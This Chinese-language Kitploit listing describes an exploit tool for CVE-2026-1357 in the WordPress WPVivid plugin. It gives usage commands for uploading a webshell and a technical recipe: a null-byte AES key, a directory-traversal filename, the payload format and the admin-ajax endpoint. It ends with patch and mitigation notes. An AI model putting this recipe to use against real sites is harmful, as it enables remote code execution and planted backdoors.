Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Exploit-CVE-2026-1357 — CVE-2026-1357 在 WordPress WPVivid 插件中的漏洞利用,可通过精心构造的 AES 加密载荷和目录遍历上传 WebShell,实现远程代码执行。 | Kitploit
工具/GitHubGitHub/itsismarcos/exploit-cve-2026-1357
漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubitsismarcos/exploit-cve-2026-1357

Exploit-CVE-2026-1357

CVE-2026-1357 在 WordPress WPVivid 插件中的漏洞利用,可通过精心构造的 AES 加密载荷和目录遍历上传 WebShell,实现远程代码执行。

查看仓库
16个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

安装依赖

pip3 install pycryptodome requests

基础利用

python3 wpvivi.py http://target.com

自定义Webshell

python3 wpvivi.py http://target.com --shell backdoor.php

python3 wpvivi.py http://target.com --code "" 技术说明: Null Byte Key:当RSA解密失败时,返回false,phpseclib将其视为"\x00\x00\x00"。我们使用16个null字节作为AES-128 ECB密钥。 目录遍历:文件名未经过净化处理,允许使用../../../../wp-content/uploads/shell.php 载荷格式:

[len_key_hex(2字节)] + [key_hex] + [len_data_hex(16字节)] + [encrypted_data] 执行: POST到 /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site wpvivid_content = base64(加密后的载荷) 检测与缓解措施:

已在0.9.124版本中修补:

  • 检查 if ($key === false || empty($key)) return false;
  • 扩展名白名单:zip,gz,tar,sql
下载工具